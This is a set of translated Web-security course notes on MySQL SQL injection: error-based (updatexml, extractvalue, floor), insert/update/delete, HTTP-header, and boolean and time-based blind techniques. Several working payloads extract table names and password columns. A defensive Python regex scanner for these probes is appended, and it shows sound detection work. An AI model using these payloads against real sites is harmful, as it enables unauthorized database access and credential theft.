Numeric SQL injection
风炫安全 Web security course, lesson 11: String-type and search-type SQL injection
风炫安全 Web security course, lesson 12: MySQL error-function injection
风炫安全 Web security course, lesson 13: SQL injection in CUD (insert/update/delete) statements
风炫安全 Web security course, lesson 14: SQL injection via HTTP headers
风炫安全 Web security course, lesson 15: Time-based and boolean-based SQL injection
SQL injection
Basics
Numeric: select username,email from users where id=1;
String: select id,email from members where username='xxx';
Search: select id,email from member where username like '%v%';
Every injection attack we perform is, in essence, closing off the site's own SQL statement and then executing our own payload.
Error-based: updatexml()
allen' and updatexml(1,version(),0)#
allen' and updatexml(1,concat(0x7e, version()),0)#
Get table names:
allen' and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 1,1)),0)#
allen' and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database())),0)#
Get column names:
allen' and updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name='member' limit 1,1)),0)#
Then fetch the data:
allen' and updatexml(1,concat(0x7e, (select pw from member limit 0,1)),0)#
Error-based: the extractvalue() function
Same usage as above.
kobe' and extractvalue(0, concat(0x7e, database())) #
Error-based: floor()
floor() is the rounding-down (integer truncation) function.
Strictly speaking, this error-based injection relies on the conflict between floor(), count() and group by, which raises the error.
Lucy' and (select 2 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a )#
insert injection
insert into member(`username`, `pw`, `sex`, `phonenum`, `address`, `email`) values('123', '456', 'boy', 1, 2,3 );
insert into member(username,pw) value('allen' or updatexml(1, concat(0x7e, database()),0) or ' ',122);
update injection
Same as above.
delete injection
1 or updatexml(1,concat(0x7e, (select pw from member limit 1,1)),0)
HTTP-header-based injection
Cookie:ant[uname]=admin' and updatexml(1,concat(0x7e, (select pw from member limit 1,1)),0)#
User-Agent: Firefox' or updatexml(1, concat(0x7e, database()), 0) or '
Blind SQL injection
lucy' and 1=1#
lucy' and 1=2#
Boolean-based blind injection:
lucy' and ascii(substr(database(),1,1))=100#
lucy' and ascii(substr(database(),1,1))>113#
Time-based blind injection
lucy' and sleep(5) #
and if(ascii(substr(database(), 2,1))=99, sleep(3), 1)
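As an added defender's example (not part of the course notes): a small Python triage scanner that looks for the probe families covered above (error-based updatexml/extractvalue/floor, information_schema lookups, sleep(), boolean tautologies and ascii/substr comparisons) in request fields such as query parameters, Cookie and User-Agent, after URL-decoding. The sample requests, the signature names and the field names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Literal forms of the probes shown in these notes (MySQL). Real traffic may hide
# them behind inline comments (/**/), char()-built strings or other encodings, so
# treat a hit as a triage signal rather than proof, and a miss as "no evidence".
SIGNATURES = {
    "error_based_xml":   re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "error_based_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "schema_probe":      re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I),
    "time_based":        re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "boolean_probe":     re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+\s*(#|--|$)", re.I),
    "char_compare":      re.compile(r"\b(ascii|ord)\s*\(\s*substr(ing)?\s*\(", re.I),
}

def normalize(value):
    """Undo one or two layers of URL encoding ('+' becomes a space, which is
    right for query strings and harmless for header values)."""
    return unquote_plus(unquote_plus(value))

def scan_request(fields):
    """fields maps a request field (query parameter, Cookie, User-Agent, ...)
    to its raw value. Returns sorted (field, signature) pairs that matched."""
    hits = set()
    for field, raw in fields.items():
        text = normalize(raw)
        for name, pattern in SIGNATURES.items():
            if pattern.search(text):
                hits.add((field, name))
    return sorted(hits)

# Constructed sample requests mirroring the payload families in the notes.
SAMPLE_REQUESTS = [
    {"id": "1", "User-Agent": "Mozilla/5.0"},                      # benign
    {"Cookie": "ant[uname]=admin' and updatexml(1,concat(0x7e,(select pw from member limit 1,1)),0)#"},
    {"User-Agent": "Firefox' or updatexml(1, concat(0x7e, database()), 0) or '"},
    {"name": "lucy%27%20and%20sleep%285%29%20%23"},                # URL-encoded time-based probe
    {"name": "lucy' and ascii(substr(database(),1,1))=100#"},
    {"name": "lucy' and 1=2#"},
]

def flagged_indices(requests=SAMPLE_REQUESTS):
    """Indices of requests with at least one hit, for pulling them out of a log."""
    return [i for i, req in enumerate(requests) if scan_request(req)]

if __name__ == "__main__":
    for i in flagged_indices():
        print(i, scan_request(SAMPLE_REQUESTS[i]))
```

In practice, feed the scanner from access logs or a WAF export and pair a hit with the database's own error log, since the error-based probes above show up there as updatexml/extractvalue XPath errors or duplicate-key errors from the floor()/group by trick.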